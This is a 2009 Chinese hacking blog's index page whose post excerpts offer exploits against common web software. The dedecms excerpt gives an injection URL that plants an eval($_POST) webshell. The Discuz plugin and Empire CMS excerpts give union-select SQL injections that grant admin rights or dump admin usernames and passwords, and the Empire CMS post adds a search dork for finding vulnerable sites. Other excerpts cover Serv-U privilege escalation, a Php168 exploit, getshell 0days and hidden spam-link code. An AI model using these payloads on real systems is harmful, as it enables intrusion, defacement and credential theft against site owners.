『天使之翼's BLOG - 技术无止境,挑站赢世界!』
百度空间 | 百度首页 
 
推荐文章
 
 
 
     
 
文章列表
 
消失几个月了,冒个泡
2009-11-25 08:59

消失几个月了,冒个泡

继续消失,潜水`````````

类别:个人情感 | 评论(0) | 浏览()
 
Serv-U FTP Server v8 本地提权
2009-09-01 15:58
发布日期:2009-08-05
更新日期:2009-08-05

受影响系统:
serv-u8

不受影响系统:
其他版本不受影响

描述:
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。

Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
2
阅读全文>>
类别:技术交流 | 评论(1) | 浏览()
 
如何读取注册表RUN项里面有几个键值!
2009-09-01 15:57

一、批处理:(保存为.bat或.cmd文件)
1、利用reg query:
@echo off
set r=\Software\Microsoft\Windows\CurrentVersion\Run
for /f "skip=3 delims=" %%a in ('reg query HKLM%r%') do echo.%%a
echo.&echo.&echo.
for /f "skip=3 delims=" %%a in ('reg query HKCU%r%') do echo.%%a
pause

2、利用reg export:
@echo off
md RunInf
pushd R

阅读全文>>
类别:技术交流 | 评论(1) | 浏览()
 
dedecms注入漏洞 影响版本5.3 – 5.5Posted in php
2009-08-30 08:40

dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究。利用此漏洞进行违法活动者,后果自负。

假设域名是:www.abc.com 攻击步骤如下:
1. 访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见以下错误信息


2

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
安全挂黑连接的方法
2009-07-31 12:28

如果您不晓得什么是隐藏链接,或者不晓得隐藏链接的作用,
  那么您需要马上百度一下了..
复制内容到剪贴板代码:

  DIV:
  <div style="display:none;">
  <a href=http://www.hacker.com.cn/
  target="_blank">Linux</a></div>
  
  javascript:
  <script language="javascript" type="text/javascript">
  document.write("<div style='display:none;'>");

阅读全文>>
类别:技术交流 | 评论(1) | 浏览()
 
Discuz!黑道生涯插件注射漏洞
2009-07-27 12:33

插件版本:2.2   2.5

注册一个论坛ID
IE提交下面代码

blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/

提升到管理员

discuz7.0.0后台得webshell方法
http://www.oldjun.com/blog/index.php/archives/48/

如果是discuz6.0 的后台就提交
admincp.ph

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
Php168 v6 权限提升漏洞
2009-07-19 02:13

by Ryat
http://www.wolvez.org
2009-07-17

天天上班,好久没在论坛发贴了...

以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段
直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)

EXP:


#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: p

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
Discuz! admin\styles.inc.php get-webshell bu
2009-07-17 02:44

author: ring04h
team:http://www.80vul.com

由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞.

一 分析

在文件admin\styles.inc.php里代码:
if($newcvar && $newcsubst) {
   if($db->result_first("SELECT COUNT(*) FROM {

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
Discuz!<5.50 preg_match()的变量$onlineipmatches未初始化漏洞
2009-07-17 02:44

author: 80vul-B
team:http://www.80vul.com

一 分析

文件include/common.inc.php里:

$magic_quotes_gpc = get_magic_quotes_gpc();

@extract(daddslashes($_COOKIE));
@extract(daddslashes($_POST));
@extract(daddslashes($_GET));
//覆盖变量,这里我们可以覆盖$_SERVER
if(!$magic_qu

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
Discuz! 7.0 及以下版本后台拿webshell(无需创始人)
2009-07-15 10:02

作者:oldjun

我很少关心之类的漏洞,已经很少拿站了,遇到DZ更加只是路过,也没去过多关心DZ的漏洞或者去研究代码;前不久论坛被人留下一个shell,害我检查半天,不过既然遇到了,那就公布出来方便大家。

我先声明:
1.这个不是我首发,很多牛牛很早之前就发现了,但没人公布,ring04h牛那貌似有个:

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
风讯 4.0 SP7 getshell 0day
2009-07-13 09:41
来源:http://www.0kee.com/read.php?tid-1041.html

发现者:bloodsword、bink,转载请无视
影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。

漏洞描述:建立目录的地方,名称过滤上有失误,导致

阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
mssql 2005+php 注射语句
2009-07-13 09:40
注射点:http://xxx.in.th/news_show.php?newsid=400

要用union查询的话,先确定有几个字段,使用order by 来完成,就是:
阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
帝国CMS0day----成功率高哦
2009-07-13 09:40
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码

测试方法:利用google搜索关键字 inurl:e/tool/gbook/?bid=1,然后依照
阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
简单获取IIS来宾帐户(IUSR_XXX)和进程启动帐户(IWAM_XXX)密码
2009-06-29 06:15

以前曾写过一篇博文《重置IIS来宾帐户(IUSR_XXX)和进程启动帐户(IWAM_XXX)密码》,主要用作在不小心修改了IIS里面的相关账户的情况。今天逛Bin牛(aspxspy作者)的Blog的时候,突然注意到他有一篇比较早的日志提到IIS的用户名和密码貌似是明

阅读全文>>
类别:技术交流 | 评论(1) | 浏览()
 
MSSQL下用UNION和系统表配合猜表名和字段名深度注入
2009-06-29 06:13
Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul
转载请带上版权。

这是这次出攻防大赛题目的时候顺便做的一些注入总结,是我通过查询系统表结构总结出来的。只要注入点有效,并且没有过滤单引号,即使它管理员表名和字段名设置的再复杂都是可以猜出来的,而且由于是用union,效率还是很高的。还有只需要DBO权限即可。

以一个数字型注入点为例( 暂时假设这个数字型注入点对单
阅读全文>>
类别:技术交流 | 评论(0) | 浏览()
 
更多文章>>
     
 
 
关于我
 

网名:天使之翼

联系QQ:1581901

E-Mali:hack078@163.com

人生格言:

技术无止境,挑站赢世界!

   
 
个人档案
 
々天使々之翼々

上次登录:
6天前
加为好友
 
   
 
最新照片
 
   
 
留言板
 

交换个友情链接,呵呵。。。 http://www.lijiejie.cn/blog 你的连接已经做好了。
 

你好,加个好友吧!谢谢!
 

图片
 

hack078 筹备的怎么样了
 

哈哈,我这两天更换模板了的,不小心模块全没了,又从新弄的,你那里有html的留言板代...
 
留言(8条)>>
     
 
最新评论
 
     
 
文章分类
 
默认分类(0)
 
个人情感(4)
 
网络记事(17)
 
技术交流(365)
 
风雨杂谈(4)
 
原创精品(5)
 
体坛风云(2)
 
     
 
RSS订阅
 
   
 
最近访客
 
 

shomari2009
cao2109

wxh212
FovSean

51webshell
hpypl

xp7009
yizw01
     
 
背景音乐
 
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu